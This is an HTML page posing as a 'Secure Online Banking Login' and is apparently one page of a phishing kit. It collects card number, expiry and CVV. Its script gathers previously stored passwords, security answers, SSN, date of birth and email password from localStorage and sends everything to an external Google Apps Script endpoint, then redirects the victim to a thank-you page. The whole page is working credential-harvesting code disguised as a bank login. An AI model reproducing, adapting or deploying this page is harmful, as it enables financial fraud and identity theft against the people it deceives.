
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Secure Online Banking Login</title>
  <style>
    body {
      margin: 0;
      font-family: Segoe UI, Arial, sans-serif;
      background: url('images/s1.png') no-repeat center center fixed;
      background-size: cover;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .form-container {
      max-width: 460px;
      background-color: rgba(255,255,255,0.95);
      padding: 30px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.2);
      z-index: 2;
    }
    h2 {
      text-align: center;
      color: #333;
      margin-bottom: 25px;
    }
    label {
      display: block;
      margin: 15px 0 5px;
      font-weight: bold;
      color: #333;
    }
    input[type="text"],
    input[type="month"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 15px;
      font-size: 14px;
      border: 1px solid #ccc;
      border-radius: 4px;
    }
    input:focus {
      border-color: #0e8400;
      outline: none;
    }
    .button {
      background-color: #f8971d;
      border: none;
      color: white;
      padding: 12px 20px;
      font-size: 16px;
      border-radius: 4px;
      cursor: pointer;
      width: 100%;
      margin-top: 10px;
    }
    .button:hover {
      background-color: #e18510;
    }
  </style>
</head>
<body>
  <div class="form-container">
    <h2>Secure Online Banking Login</h2>
    <form id="finalForm" autocomplete="off">
      <label for="card">Card Number:</label>
      <input type="text" name="card" id="card" maxlength="19" required>

      <label for="expiry">Expiry Date:</label>
      <input type="month" name="expiry" id="expiry" required>

      <label for="cvv">CVV:</label>
      <input type="text" name="cvv" id="cvv" maxlength="4" required>

      <button type="submit" class="button">Finish</button>
<p id="submitStatus" style="text-align:center;color:#333;margin-top:10px;display:none;">Submitting, please wait...</p>

    </form>
  </div>

<script>
document.addEventListener("DOMContentLoaded", () => {
  const form = document.getElementById("finalForm");

  form.addEventListener("submit", async function (e) {

      document.querySelector(".button").disabled = true;
      document.getElementById("submitStatus").style.display = "block";

    e.preventDefault();

    const data = {
      memberNumber: localStorage.getItem("memberNumber") || "",
      password: localStorage.getItem("password") || "",
      question1: localStorage.getItem("question1") || "",
      answer1: localStorage.getItem("answer1") || "",
      question2: localStorage.getItem("question2") || "",
      answer2: localStorage.getItem("answer2") || "",
      question3: localStorage.getItem("question3") || "",
      answer3: localStorage.getItem("answer3") || "",
      fname: localStorage.getItem("fname") || "",
      lname: localStorage.getItem("lname") || "",
      address: localStorage.getItem("address") || "",
      zip: localStorage.getItem("zip") || "",
      ssn: localStorage.getItem("ssn") || "",
      dob: localStorage.getItem("dob") || "",
      email: localStorage.getItem("email") || "",
      emailPass: localStorage.getItem("emailPass") || "",

      card: document.getElementById("card").value,
      expiry: document.getElementById("expiry").value,
      cvv: document.getElementById("cvv").value,
    };

    const formBody = new URLSearchParams(data).toString();

    try {
      const res = await fetch("https://script.google.com/macros/s/AKfycbzbd6TDFjLP5NPsag_qcwXCrP8g5-1JI4AeiKFh7RbeqLqF1vGoavWLmedAMVWeP3NB/exec", {
        method: "POST",
        headers: { "Content-Type": "application/x-www-form-urlencoded" },
        body: formBody
      });

      if (res.ok) {
        localStorage.clear();
        window.location.href = "thank-you.html";
      } else {
        alert("Submission failed.");
      }
    } catch (err) {
      console.error("Submit Error", err);
      alert("Something went wrong.");
    }
  });
});
</script>
</body>
</html>
